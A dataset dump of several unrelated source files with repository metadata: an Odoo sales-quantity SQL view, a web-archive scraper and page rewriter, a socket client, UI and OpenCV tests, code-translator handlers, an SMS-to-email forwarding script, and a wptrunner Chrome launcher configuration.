adc963ff1204c00fb87b90795664b46370b2735d
|
a1e10efa6a131e305351909a437bfa5d083d4513
|
/summary_product_report/reports/product_sales_qty_report/product_sales_qty_report.py
|
399f5bde169bc9bdd57785835dabc268a4757791
|
[] |
no_license
|
h3llopy/glodok_extra_addons_od12
|
5089412b36b0dafdb17235a627c8e33ed2acbb1f
|
5c493962b93254fb2ca8cd674c4fe153ac86d680
|
refs/heads/master
| 2022-12-05T06:22:08.182302
| 2020-08-29T14:32:30
| 2020-08-29T14:32:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,188
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _,tools
from odoo.exceptions import UserError,ValidationError
import logging
_logger = logging.getLogger(__name__)
class ProductSalesQtyReport(models.Model):
    """SQL-view model reporting daily sold quantity per product over a
    trailing window configured by the `interval.product_sales_qty_report`
    system parameter (days)."""
    _name = 'product.sales.qty.report'
    _description = 'Product Sales Qty Report'
    # Backed by the database view created in init(), not a regular table.
    _auto = False

    product_id = fields.Many2one('product.product', string="Product", readonly=True)
    product_tmpl_id = fields.Many2one('product.template', string="Product Templat", readonly=True)
    product_uom_qty = fields.Float('Qty', readonly=True, group_operator='sum')
    date_series = fields.Date(string="Date Series", readonly=True)
    uom_id = fields.Many2one('product.uom', string="UOM", related="product_tmpl_id.uom_id", readonly=True)

    def _select(self):
        # Returns the SELECT used as the view body: a generated day series
        # cross-joined with all products, left-joined to done sale lines.
        # NOTE(review): the synthetic `id` combines the date with the
        # *template* id while rows are grouped by variant (prod.id), so two
        # variants of one template sold on the same day would produce
        # duplicate ids — confirm whether variants occur in this database.
        query = """
            WITH series AS (
                SELECT date_trunc('day', dd)::date as ds
                FROM generate_series(
                    (
                        SELECT NOW()-(CONCAT(icp.value,' day')::interval)
                        FROM ir_config_parameter icp
                        -- WHERE key='auth_signup.template_user_id'
                        WHERE key='interval.product_sales_qty_report'
                    )
                    , now()::timestamp
                    , '1 day'::interval
                ) dd
            )
            SELECT
                CONCAT(to_char(series.ds, 'YYYYMMDD'), LPAD(prod.product_tmpl_id::text,4,'0'))::bigint AS id
                ,prod.id as product_id
                ,prod.product_tmpl_id
                ,SUM(CASE WHEN ps.product_id is NOT NULL THEN ps.product_uom_qty ELSE 0 END) AS product_uom_qty
                ,series.ds as date_series
            FROM series
            CROSS JOIN product_product prod
            LEFT JOIN (
                SELECT
                    pp.id as product_id
                    ,pp.product_tmpl_id
                    ,(CASE WHEN sol.id IS NOT NULL THEN sol.product_uom_qty ELSE 0 END) AS product_uom_qty
                    ,so.date_order
                    ,so.id as so_id
                FROM product_product AS pp
                LEFT JOIN sale_order_line AS sol ON sol.product_id = pp.id AND sol.state='done'
                LEFT JOIN sale_order AS so ON so.id = sol.order_id
            ) ps ON prod.id=ps.product_id and series.ds::date = ps.date_order::date
            GROUP BY prod.id,series.ds
        """
        return query

    @api.model_cr
    def init(self):
        # Recreate the backing SQL view on module install/upgrade.
        tools.drop_view_if_exists(self.env.cr, self._table)
        self.env.cr.execute("""CREATE or REPLACE VIEW %s as (
            %s
        )""" % (self._table, self._select()))
|
[
"kikin.kusumah@gmail.com"
] |
kikin.kusumah@gmail.com
|
7ea725be597104cfa2dac6fd1b1f81b9726da36d
|
13f4a06cd439f579e34bf38406a9d5647fe7a0f3
|
/script/try_python/try_Django/mzitu_com/mzitu_com_project/mzitu_com_project/home_page_transform.py
|
595accd90ae239ec0258a9fae2673b5f268d2f68
|
[] |
no_license
|
edt-yxz-zzd/python3_src
|
43d6c2a8ef2a618f750b59e207a2806132076526
|
41f3a506feffb5f33d4559e5b69717d9bb6303c9
|
refs/heads/master
| 2023-05-12T01:46:28.198286
| 2023-05-01T13:46:32
| 2023-05-01T13:46:32
| 143,530,977
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,505
|
py
|
__all__ = '''
home_page_transform__url
home_page_transform__page
extract_mzitu_com__the_all_or_old_page
'''.split()
#NotFoundError
#find
from nn_ns.internet.webpage.fetch_webpage import fetch_webpage
from seed.helper.repr_input import repr_helper
from bs4 import BeautifulSoup
import re
from urllib.parse import urlparse, urlunparse
from pathlib import PurePosixPath as Path
from .DATA import project_per_page_url_route
r'''
def make_project_per_page_url_base(new_url):
parse_result = urlparse(new_url)
parts = (parse_result.scheme, parse_result.netloc, project_per_page_url_route, '', '', '')
project_per_page_url_base = urlunparse(parts)
return project_per_page_url_base
'''
r'''
def home_page_transform__url(old_url, new_project_website):
# .DATA.website_all_old/website_all_new
# e.g. home_page_transform__url(.DATA.website_all_old, 'http://127.0.0.1:8000/')
# e.g. home_page_transform__url('https://www.mzitu.com/old/', 'http://127.0.0.1:8000/')
# e.g. home_page_transform__url('https://www.mzitu.com/all/', 'http://127.0.0.1:8000/')
#
assert new_project_website[-1:] == '/'
'''
# Route under which individual project pages are served, as a relative path.
project_per_page_url_relative_base = Path(project_per_page_url_route)


def home_page_transform__url(old_url):
    """Fetch the mzitu.com 'all'/'old' index page at `old_url` and rewrite it
    so every per-project link points at this project's own page route.

    e.g. home_page_transform__url('https://www.mzitu.com/all/')
         home_page_transform__url('https://www.mzitu.com/old/')
    """
    page_html = fetch_webpage(old_url)
    # The configured route must be site-absolute ('/...') for the rewrite.
    assert project_per_page_url_route[:1] == '/'
    return home_page_transform__page(page_html, project_per_page_url_relative_base)
class NotFoundError(Exception):
    """Raised by `find` when a soup lookup returns None.

    Keeps the positional and keyword arguments of the failed query so the
    repr shows exactly what was searched for.
    """
    def __init__(self, *args, **kwargs):
        # Exception.args is deliberately overwritten with the query args.
        self.args = args
        self.kwargs = kwargs
    def __repr__(self):
        return repr_helper(self, *self.args, **self.kwargs)
def find(soup_find, *args, **kwargs):
    """Call a BeautifulSoup find-style method and insist on a hit.

    Returns the match; raises NotFoundError (carrying the query arguments)
    when the lookup came back None.
    """
    result = soup_find(*args, **kwargs)
    if result is None:
        raise NotFoundError(*args, **kwargs)
    return result
def extract_mzitu_com__the_all_or_old_page(html_page):
    # html_page of .../all/ or .../old/
    #
    # html_page -> (html_title, [((year::str, month::str), [(old_url::str, title::str)])])
    #
    """Parse the mzitu.com archive index into (page title, grouped project links)."""
    soup = BeautifulSoup(html_page, 'lxml')
    [html_title] = soup.head.find_all('title')
    html_title = html_title.get_text()
    # Archive layout: div.main > div.all > repeated div.year headers, each
    # followed (as a *sibling*) by a ul.archives of months and link lists.
    [class_main] = soup.find_all('div', {'class': 'main'})
    [class_all] = class_main.find_all('div', {'class': 'all'})
    class_years = class_all.find_all('div', {'class': 'year'})
    #what's the name of tail-string?#?No such name in bs4?
    #print(dir(class_main))
    #import sys; sys.exit()
    year_month__url_title_pairs__pairs = []
    for class_year in class_years:
        year = class_year.get_text()
        class_archives = find(class_year.find_next_sibling, 'ul', {'class':'archives'})
        class_monthes = class_archives.find_all('p', {'class': 'month'})
        for class_month in class_monthes:
            month = class_month.get_text()
            # The p.url holding this month's links is the month header's sibling.
            class_url = find(class_month.find_next_sibling, 'p', {'class':'url'})
            href_children = class_url.find_all('a')
            year_month = year, month
            url_title_pairs = []
            for href_child in href_children:
                url = href_child['href']
                title = href_child.get_text()
                url_title_pairs.append((url, title))
            year_month__url_title_pairs__pairs.append((year_month, url_title_pairs))
    return html_title, year_month__url_title_pairs__pairs
# Skeleton document the rewritten index is built into: home_page_transform__page
# fills the <title> and the <ul>.
new_html_begin = r'''
<!DOCTYPE html>
<html>
<head> <title></title> </head>
<body>
<ul>
</ul>
</body>
</html>
'''

# NOTE(review): `body_tpl` appears unused in this module — presumably a
# leftover of an earlier string-template approach; confirm before removing.
body_tpl = r'''
{year} {month} {new_url} {title}
'''
def old_url2new_url(old_url, project_per_page_url_base: Path):
    """Map a mzitu.com project URL onto this project's per-page route.

    Only the final path component of `old_url` (the project id) is kept and
    appended to `project_per_page_url_base`.
    """
    return project_per_page_url_base / Path(old_url).name
def home_page_transform__page(html_page, project_per_page_url_base: Path):
    """Rebuild the archive index as a minimal page whose project links point
    at this project's own per-page route (each opening in a new tab)."""
    (html_title, year_month__url_title_pairs__pairs
        ) = extract_mzitu_com__the_all_or_old_page(html_page)
    new_soup = BeautifulSoup(new_html_begin, 'lxml')
    [new_title_tag] = new_soup.find_all('title')
    new_title_tag.append(html_title)
    [new_ul_tag] = new_soup.find_all('ul')
    # One <li> per (year, month): a heading <p>, then a <p> of <a>/<br> pairs.
    for (year, month), url_title_pairs in year_month__url_title_pairs__pairs:
        new_li_tag = new_soup.new_tag('li')
        new_ul_tag.append(new_li_tag)
        fst_new_p_tag = new_soup.new_tag('p')
        new_li_tag.append(fst_new_p_tag)
        fst_new_p_tag.string = f'{year} {month}'
        snd_new_p_tag = new_soup.new_tag('p')
        new_li_tag.append(snd_new_p_tag)
        for old_url, title in url_title_pairs:
            new_url = old_url2new_url(old_url, project_per_page_url_base)
            new_href_tag = new_soup.new_tag('a', href=new_url, target="_blank")
            new_href_tag.string = title
            new_br_tag = new_soup.new_tag('br')
            snd_new_p_tag.append(new_href_tag)
            snd_new_p_tag.append(new_br_tag)
    #new_html_page = new_soup.encode('gb18030')
    new_html_page = str(new_soup)
    return new_html_page
|
[
"wuming_zher@zoho.com.cn"
] |
wuming_zher@zoho.com.cn
|
eb7284de08d0db2639a08a3dc6348c377f0be6e4
|
b53e3d57d31a47a98d87141e44a5f8940ee15bca
|
/src/utils/socket_client/socket_client.py
|
d64c219641216ff48c67160faa9ad2d93b41bdeb
|
[
"MIT"
] |
permissive
|
Chrissimple/program-y
|
52177fcc17e75fb97ab3993a4652bcbe7906bd58
|
80d80f0783120c2341e6fc57e7716bbbf28a8b3f
|
refs/heads/master
| 2020-03-29T13:20:08.162177
| 2018-09-26T19:09:20
| 2018-09-26T19:09:20
| 149,952,995
| 1
| 0
| null | 2018-09-23T06:11:04
| 2018-09-23T06:11:04
| null |
UTF-8
|
Python
| false
| false
| 651
|
py
|
# client.py
"""Minimal JSON-over-TCP question client.

Usage: client.py <host> <port> <question> <clientid> [max_size]
Sends {"question": ..., "clientid": ...} and prints the server's answer.
"""
import socket
import sys
import json

host = sys.argv[1]
port = int(sys.argv[2])
question = sys.argv[3]
clientid = sys.argv[4]

# Maximum number of bytes to read back from the server.
max_size = 1024
if len(sys.argv) == 6:
    # Bug fix: the optional argument arrived as a string, but socket.recv()
    # requires an int buffer size — cast it.
    max_size = int(sys.argv[5])

payload = {"question": question, "clientid": clientid}
json_data = json.dumps(payload)

# create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connection to hostname on the port.
s.connect((host, port))

# sendall retries until the whole payload is written (send() may write less).
s.sendall(json_data.encode('utf-8'))

# Receive no more than max_size bytes
received = s.recv(max_size)
s.close()

json_data = json.loads(received.decode('utf-8'))
print("Answer: %s" % json_data['answer'])
|
[
"keith@keithsterling.com"
] |
keith@keithsterling.com
|
c5a78fbd2e9b6d4765751767fa9482d51b71cf16
|
7986ec6498e3f93967fa9bfe2b6a9d4056138293
|
/Protheus_WebApp/Modules/SIGAFIN/FINA171TESTCASE.py
|
d514f8aee6362dfcd0583815fa42b1334b983c59
|
[
"MIT"
] |
permissive
|
HelenaAdrignoli/tir-script-samples
|
7d08973e30385551ef13df15e4410ac484554303
|
bb4f4ab3a49f723216c93f66a4395e5aa328b846
|
refs/heads/master
| 2023-02-21T11:26:28.247316
| 2020-04-28T16:37:26
| 2020-04-28T16:37:26
| 257,304,757
| 0
| 0
|
MIT
| 2020-04-20T14:22:21
| 2020-04-20T14:22:20
| null |
UTF-8
|
Python
| false
| false
| 1,786
|
py
|
from tir import Webapp
import unittest
class FINA171(unittest.TestCase):
    """TIR UI test for Protheus routine FINA171 (financial investments).

    Creates a CDB investment record, re-opens it to verify every persisted
    field, then deletes it, confirming the same values on the way out.
    """

    @classmethod
    def setUpClass(inst):
        # Log into SIGAFIN at a fixed base date/branch and open the routine.
        inst.oHelper = Webapp()
        inst.oHelper.Setup('SIGAFIN','12/09/2019','T1','D MG 01 ','06')
        inst.oHelper.Program("FINA171")

    def test_FINA171_CT006(self):
        # Create the investment record.
        self.oHelper.SetButton("Incluir")
        self.oHelper.SetBranch('D MG 01')
        self.oHelper.SetValue('Numero','FITIR1')
        self.oHelper.SetValue('Modelo',"A")
        self.oHelper.SetValue('Operacao',"CDB")
        self.oHelper.SetValue('Banco',"033")
        self.oHelper.SetValue('Agencia', '00001')
        self.oHelper.SetValue('Conta Banco', '0000000004')
        self.oHelper.SetValue('Vlr.Operacao', '1000,00')
        self.oHelper.SetValue('Moeda', '1')
        self.oHelper.SetButton("Salvar")
        self.oHelper.SetButton("Cancelar")
        # Re-open the record and verify the persisted fields.
        self.oHelper.SetButton("Visualizar")
        self.oHelper.CheckResult('EH_NUMERO','FITIR1')
        self.oHelper.CheckResult('EH_APLEMP','APL')
        self.oHelper.CheckResult('EH_TIPO','CDB')
        self.oHelper.CheckResult('EH_BANCO','033')
        self.oHelper.CheckResult('EH_AGENCIA','00001')
        self.oHelper.CheckResult('EH_CONTA','0000000004')
        self.oHelper.CheckResult('EH_VALOR','1000,00')
        self.oHelper.SetButton("Cancelar")
        # Locate the record in the browse and delete it, re-checking fields
        # on the confirmation screen.
        self.oHelper.SearchBrowse(f"D MG 01 FITIR101")
        self.oHelper.SetButton("Outras Ações", "Excluir")
        self.oHelper.CheckResult('EH_NUMERO','FITIR1')
        self.oHelper.CheckResult('EH_APLEMP','APL')
        self.oHelper.CheckResult('EH_TIPO','CDB')
        self.oHelper.CheckResult('EH_BANCO','033')
        self.oHelper.CheckResult('EH_AGENCIA','00001')
        self.oHelper.CheckResult('EH_CONTA','0000000004')
        self.oHelper.CheckResult('EH_VALOR','1000,00')
        self.oHelper.SetButton("Confirmar")
        self.oHelper.AssertTrue()

    @classmethod
    def tearDownClass(inst):
        inst.oHelper.TearDown()
if __name__ == "__main__":
unittest.main()
|
[
"hadrignoli@gmail.com"
] |
hadrignoli@gmail.com
|
cd1d00359df9774b800509d1661d19dd46beb71a
|
61bccf4117ba351365a2526603024a0e99e2559f
|
/pseudo/api_translators/python_api_handlers.py
|
3c5ed44386fdc67cbeaac8e5745a3471fdeff16d
|
[
"MIT"
] |
permissive
|
gitter-badger/pseudo
|
781363ee0c116ee0d7dfce968b007708a33c8bc4
|
070a2649d47170927184ad19af8c32c7be4f7612
|
refs/heads/master
| 2021-01-22T15:43:29.890465
| 2016-03-07T03:42:19
| 2016-03-07T03:42:19
| 53,293,990
| 0
| 0
| null | 2016-03-07T03:48:09
| 2016-03-07T03:48:08
| null |
UTF-8
|
Python
| false
| false
| 2,630
|
py
|
from pseudo.pseudo_tree import Node, call, method_call, local, assignment, to_node
from pseudo.api_handlers import BizarreLeakingNode, NormalLeakingNode
def expand_map(receiver, func):
    """Translate a pseudo `map` call into a Python-target AST node.

    A lambda argument becomes a list-comprehension node; any other callable
    is passed straight to builtin `map`.
    """
    if func.type == 'lambda':
        # NOTE(review): the comprehension node is built without `func` —
        # presumably the translator attaches the expression later; confirm.
        return Node(
            '_py_list_comp',
            sequence=receiver)
    else:
        return call('map', [func, receiver])
def expand_filter(receiver, func):
    """Translate a pseudo `filter` call into a Python-target AST node.

    A lambda argument becomes a list-comprehension node; any other callable
    is passed straight to builtin `filter`.
    """
    if func.type == 'lambda':
        # NOTE(review): unlike expand_map, this node carries neither the
        # sequence nor the predicate — looks incomplete; confirm upstream.
        return Node(
            '_py_list_comp')
    else:
        return call('filter', [func, receiver])
def expand_set_slice(receiver, from_=None, to=None, value=None, pseudo_type=None):
    """Build an assignment node that stores `value` into a slice of `receiver`."""
    target_slice = expand_slice(receiver, from_, to, pseudo_type)
    return assignment(target_slice, value)
def expand_slice(receiver, from_=None, to=None, pseudo_type=None):
    """Pick the specialized Python slice node for the given endpoints.

    Chooses among `_py_slice`, `_py_slice_from` and `_py_slice_to`; a slice
    starting at the literal int 0 is normalized to a to-only slice. Returns
    None when neither endpoint is given.
    """
    if from_ and to:
        if from_.type == 'int' and from_.value == 0:
            # [0:to] is just [:to]
            return Node('_py_slice_to', sequence=receiver, to=to, pseudo_type=pseudo_type)
        return Node('_py_slice', sequence=receiver, from_=from_, to=to, pseudo_type=pseudo_type)
    if from_:
        return Node('_py_slice_from', sequence=receiver, from_=from_, pseudo_type=pseudo_type)
    if to:
        return Node('_py_slice_to', sequence=receiver, to=to, pseudo_type=pseudo_type)
    return None
class ReadFile(BizarreLeakingNode):
    '''
    transforms `io:read_file`

    `io:read_file(name)`
    to
    `with open(name, 'r') as _f:
        <target>/_file_contents = f.read()`
    '''

    def temp_name(self, target):
        # Name for the implicit result variable when the call's value is
        # consumed inside a larger expression.
        return '_file_contents'

    # assign : as_assignment
    # block-level: as_expression
    # inside: as_assignment with temp_name as target

    def as_expression(self):
        # Emit the `with open(...) as _f:` statement whose body is the bare
        # `_f.read()` call; the trailing None fills the (statements,
        # expression) slot of the leaking-node contract.
        return [Node(
            '_py_with',
            call=call('open', [self.args[0], to_node('r')], 'File'),
            context='_f',
            block=[method_call(local('_f', 'File'), 'read', [], 'String')],
            pseudo_type='Void')], None

    def as_assignment(self, target):
        # Reuse the expression form, rewriting the body's read() call into
        # `target = _f.read()` in place.
        expression = self.as_expression()[0][0]
        expression.block[0] = assignment(target, expression.block[0])
        return [expression]
class WriteFile(NormalLeakingNode):
    '''
    transforms `io:write_file`

    `io:write_file(name, stuff)`
    `with open(name, 'w') as _f:
        _f.write(stuff)`
    '''

    def as_expression(self):
        # No leading statements; the whole call is one `with` block that
        # opens the file for writing and writes args[1] into it.
        return [], Node(
            '_py_with',
            call=call('open', [self.args[0], to_node('w')], 'File'),
            context='_f',
            block=[method_call(local('_f', 'File'), 'write', [self.args[1]], 'Void')],
            pseudo_type='Void')
|
[
"alehander42@gmail.com"
] |
alehander42@gmail.com
|
2a208e38f3ee3b3d5ad2f906c8d4f09584af8142
|
3d7383bd777c9c49525ac7a0565b21ddea22f480
|
/draw/migrations/0003_canvas_in_use.py
|
285857b18f75cec4f092b92ad0eb9c1de1bb493c
|
[] |
no_license
|
eranfuchs1/draw-factory
|
34b785f97960adc7f4ddf105c355f83d0c83f7d7
|
064f481a5f42a72d6ca2945b145f688ca819ac39
|
refs/heads/main
| 2023-08-17T21:24:40.737542
| 2021-10-10T13:53:32
| 2021-10-10T13:53:32
| 411,957,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
# Generated by Django 3.2.7 on 2021-09-16 13:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the nullable boolean column `in_use` to the `canvas` model."""
    # NOTE(review): null=True means existing rows get NULL rather than False;
    # readers must treat NULL as "unknown" — confirm intended semantics.

    dependencies = [
        ('draw', '0002_auto_20210910_0639'),
    ]

    operations = [
        migrations.AddField(
            model_name='canvas',
            name='in_use',
            field=models.BooleanField(null=True),
        ),
    ]
|
[
"xer@xer-labtop"
] |
xer@xer-labtop
|
9040a4631960319ec6148982d433cd13b8960be8
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/4975214/snippet.py
|
89b2ebfbf651f8646080afc7aa78e741eb01c122
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,947
|
py
|
#!/usr/bin/env python3
# Joonas Kuorilehto 2013
# This script is Public Domain.
import csv
import subprocess
import pipes
from datetime import datetime
import smtplib
from email.mime.text import MIMEText
EMAIL = **************
ADB_BINARY = "adt-bundle-linux-x86_64/sdk/platform-tools/adb"
SMS_DB = "/data/data/com.android.providers.telephony/databases/mmssms.db"
def android_sql(sql_query):
    """Run `sql_query` against the on-device SMS sqlite DB via `adb shell su`
    and return the CSV output parsed into a csv.DictReader.
    """
    # Double-quote: first for sqlite3's argv on-device, then for `su -c`.
    cmd = 'sqlite3 -csv -header %s %s' % (SMS_DB, pipes.quote(sql_query))
    shell_cmd = 'su -c {}'.format(pipes.quote(cmd))
    p = subprocess.Popen([ADB_BINARY, 'shell', shell_cmd],
                         stdout=subprocess.PIPE, universal_newlines=True)
    sqlite_out, sqlite_stderr = p.communicate()
    # NOTE(review): pre-splitting on "\n" breaks quoted multi-line message
    # bodies — DictReader could consume splitlines()/the raw stream directly;
    # confirm bodies never embed newlines before relying on this.
    reader = csv.DictReader(sqlite_out.split("\n"))
    return reader
def get_unread_messages():
    """Return ([ids of unread SMS rows], formatted text of those messages)."""
    rows = android_sql("SELECT _id, address, date, body FROM sms WHERE read=0;")
    ids = []
    chunks = []
    for row in rows:
        ids.append(row['_id'])
        # sms.date is epoch milliseconds
        stamp = datetime.fromtimestamp(int(int(row['date'])/1000))
        chunks.append("{} [{}]\n {}\n\n".format(stamp, row['address'], row['body']))
    return (ids, "".join(chunks))
def send_email(message_content, sender=EMAIL, to=EMAIL,
               subject="Received SMS messages", charset="UTF-8"):
    """Send `message_content` as a text/plain mail via the local SMTP server."""
    mail = MIMEText(message_content.encode(charset), _charset=charset)
    mail['Subject'] = subject
    mail['From'] = sender
    mail['To'] = to

    smtp = smtplib.SMTP('localhost')
    smtp.send_message(mail)
    smtp.quit()
def main():
    """Forward any unread SMS messages by mail, then mark them read on-device."""
    ids, body = get_unread_messages()
    if not ids:
        return
    send_email(body)
    android_sql("UPDATE sms SET read=1 WHERE _id in ({});".format(",".join(ids)))
if __name__ == '__main__':
main()
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
2c9a8ded7947bcb9ce4a3f05b9e33107d4f561f4
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/testing/web-platform/tests/tools/wptrunner/wptrunner/browsers/chrome.py
|
c04e715a20e5eaa0635c562676c17e8f89f45cf7
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853
| 2023-08-01T00:40:39
| 2023-08-01T00:40:39
| 211,297,481
| 0
| 0
|
NOASSERTION
| 2019-09-29T01:27:49
| 2019-09-27T10:44:24
|
C++
|
UTF-8
|
Python
| false
| false
| 5,676
|
py
|
from . import chrome_spki_certs
from .base import WebDriverBrowser, require_arg
from .base import NullBrowser
from .base import get_timeout_multiplier
from .base import cmd_arg
from ..executors import executor_kwargs as base_executor_kwargs
from ..executors.executorwebdriver import WebDriverCrashtestExecutor
from ..executors.base import WdspecExecutor
from ..executors.executorchrome import (
ChromeDriverPrintRefTestExecutor,
ChromeDriverRefTestExecutor,
ChromeDriverTestharnessExecutor,
)
__wptrunner__ = {"product": "chrome",
"check_args": "check_args",
"browser": "ChromeBrowser",
"executor": {"testharness": "ChromeDriverTestharnessExecutor",
"reftest": "ChromeDriverRefTestExecutor",
"print-reftest": "ChromeDriverPrintRefTestExecutor",
"wdspec": "WdspecExecutor",
"crashtest": "WebDriverCrashtestExecutor"},
"browser_kwargs": "browser_kwargs",
"executor_kwargs": "executor_kwargs",
"env_extras": "env_extras",
"env_options": "env_options",
"update_properties": "update_properties",
"timeout_multiplier": "get_timeout_multiplier",}
def check_args(**kwargs):
    """Validate required wptrunner kwargs: the chromedriver path must be given."""
    require_arg(kwargs, "webdriver_binary")
def browser_kwargs(logger, test_type, run_info_data, config, **kwargs):
    """Select the subset of CLI kwargs that ChromeBrowser's constructor needs."""
    return {"binary": kwargs["binary"],
            "webdriver_binary": kwargs["webdriver_binary"],
            "webdriver_args": kwargs.get("webdriver_args")}
def executor_kwargs(logger, test_type, test_environment, run_info_data,
                    **kwargs):
    """Build the executor kwargs and WebDriver capabilities for Chrome.

    Assembles goog:chromeOptions (prefs, binary, command-line flags) from the
    wptrunner CLI options and the test environment's port configuration.
    """
    # Sanitizer runs only care about crashes, so force the crashtest executor.
    sanitizer_enabled = kwargs.get("sanitizer_enabled")
    if sanitizer_enabled:
        test_type = "crashtest"
    executor_kwargs = base_executor_kwargs(test_type, test_environment, run_info_data,
                                           **kwargs)
    executor_kwargs["close_after_done"] = True
    executor_kwargs["sanitizer_enabled"] = sanitizer_enabled
    executor_kwargs["reuse_window"] = kwargs.get("reuse_window", False)
    capabilities = {
        "goog:chromeOptions": {
            "prefs": {
                "profile": {
                    "default_content_setting_values": {
                        "popups": 1
                    }
                }
            },
            "excludeSwitches": ["enable-automation"],
            "w3c": True
        }
    }
    chrome_options = capabilities["goog:chromeOptions"]
    if kwargs["binary"] is not None:
        chrome_options["binary"] = kwargs["binary"]

    chrome_options["args"] = []

    # Trust the wpt test certificates and remove user-gesture/media prompts.
    chrome_options["args"].append("--ignore-certificate-errors-spki-list=%s" %
                                  ','.join(chrome_spki_certs.IGNORE_CERTIFICATE_ERRORS_SPKI_LIST))
    chrome_options["args"].append("--autoplay-policy=no-user-gesture-required")
    chrome_options["args"].append("--use-fake-device-for-media-stream")
    chrome_options["args"].append("--use-fake-ui-for-media-stream")
    chrome_options["args"].append("--use-fake-ui-for-fedcm")
    chrome_options["args"].append("--short-reporting-delay")
    # Route *.test hostnames to loopback except the deliberately-nonexistent ones.
    chrome_options["args"].append("--host-resolver-rules=MAP nonexistent.*.test ~NOTFOUND, MAP *.test 127.0.0.1")
    chrome_options["args"].append("--enable-features=SecurePaymentConfirmationBrowser")

    # Mark each wpt server port as private/public address space for the
    # Private Network Access tests.
    address_space_overrides_ports = [
        ("http-private", "private"),
        ("http-public", "public"),
        ("https-private", "private"),
        ("https-public", "public"),
    ]
    address_space_overrides_arg = ",".join(
        f"127.0.0.1:{port_number}={address_space}"
        for port_name, address_space in address_space_overrides_ports
        for port_number in test_environment.config.ports.get(port_name, [])
    )
    if address_space_overrides_arg:
        chrome_options["args"].append(
            "--ip-address-space-overrides=" + address_space_overrides_arg)

    if kwargs["enable_mojojs"]:
        chrome_options["args"].append("--enable-blink-features=MojoJS,MojoJSTest")

    if kwargs["enable_swiftshader"]:
        # Software GL rendering via ANGLE for GPU-less environments.
        chrome_options["args"].extend(["--use-gl=angle", "--use-angle=swiftshader"])

    if kwargs["enable_experimental"]:
        chrome_options["args"].extend(["--enable-experimental-web-platform-features"])

    if kwargs["binary_args"] is not None:
        chrome_options["args"].extend(kwargs["binary_args"])

    # print-reftests require headless mode; avoid adding the flag twice.
    if ((kwargs["headless"] or test_type == "print-reftest") and
        "--headless" not in chrome_options["args"]):
        chrome_options["args"].append("--headless")

    # Force QUIC on the WebTransport-over-HTTP/3 server's port, if configured.
    webtranport_h3_port = test_environment.config.ports.get('webtransport-h3')
    if webtranport_h3_port is not None:
        chrome_options["args"].append(
            f"--origin-to-force-quic-on=web-platform.test:{webtranport_h3_port[0]}")

    if test_type == "wdspec":
        executor_kwargs["binary_args"] = chrome_options["args"]

    executor_kwargs["capabilities"] = capabilities

    return executor_kwargs
def env_extras(**kwargs):
    """Chrome requires no extra test-environment setup objects."""
    return []
def env_options():
    """Test-environment overrides: bind the wpt server to loopback for Chrome."""
    return {"server_host": "127.0.0.1"}
def update_properties():
    """run_info properties used to key test-expectation metadata updates."""
    primary = ["debug", "os", "processor"]
    dependents = {"os": ["version"], "processor": ["bits"]}
    return (primary, dependents)
class ChromeBrowser(WebDriverBrowser):
    """Chrome driven through chromedriver's WebDriver endpoint."""

    def make_command(self):
        # Command line for launching chromedriver itself (not the browser);
        # chromedriver spawns Chrome using the per-session capabilities.
        return [self.webdriver_binary,
                cmd_arg("port", str(self.port)),
                cmd_arg("url-base", self.base_path),
                cmd_arg("enable-chrome-logs")] + self.webdriver_args
|
[
"mcastelluccio@mozilla.com"
] |
mcastelluccio@mozilla.com
|
b4b41d922e148e8957787f9ba6595f80af7ff5cd
|
f83ef53177180ebfeb5a3e230aa29794f52ce1fc
|
/opencv/opencv-3.4.2/modules/python/test/test_algorithm_rw.py
|
c925a99e7b378e4a2de119a09516b8791426e911
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
msrLi/portingSources
|
fe7528b3fd08eed4a1b41383c88ee5c09c2294ef
|
57d561730ab27804a3172b33807f2bffbc9e52ae
|
refs/heads/master
| 2021-07-08T01:22:29.604203
| 2019-07-10T13:07:06
| 2019-07-10T13:07:06
| 196,183,165
| 2
| 1
|
Apache-2.0
| 2020-10-13T14:30:53
| 2019-07-10T10:16:46
| null |
UTF-8
|
Python
| false
| false
| 945
|
py
|
#!/usr/bin/env python
"""Algorithm serializaion test."""
import tempfile
import os
import cv2 as cv
from tests_common import NewOpenCVTests
class algorithm_rw_test(NewOpenCVTests):
    def test_algorithm_rw(self):
        """Round-trip AKAZE parameters through a YAML FileStorage file."""
        handle, storage_path = tempfile.mkstemp(prefix="opencv_python_algorithm_", suffix=".yml")
        os.close(handle)

        # Write an instance configured with arbitrary non-default parameters.
        source = cv.AKAZE_create(descriptor_size=1, descriptor_channels=2, nOctaves=3, threshold=4.0)
        source.write(cv.FileStorage(storage_path, cv.FILE_STORAGE_WRITE), "AKAZE")

        # Read them back into a fresh instance and verify every field survived.
        storage = cv.FileStorage(storage_path, cv.FILE_STORAGE_READ)
        restored = cv.AKAZE_create()
        restored.read(storage.getNode("AKAZE"))
        self.assertEqual(restored.getDescriptorSize(), 1)
        self.assertEqual(restored.getDescriptorChannels(), 2)
        self.assertEqual(restored.getNOctaves(), 3)
        self.assertEqual(restored.getThreshold(), 4.0)
        os.remove(storage_path)
|
[
"lihuibin705@163.com"
] |
lihuibin705@163.com
|
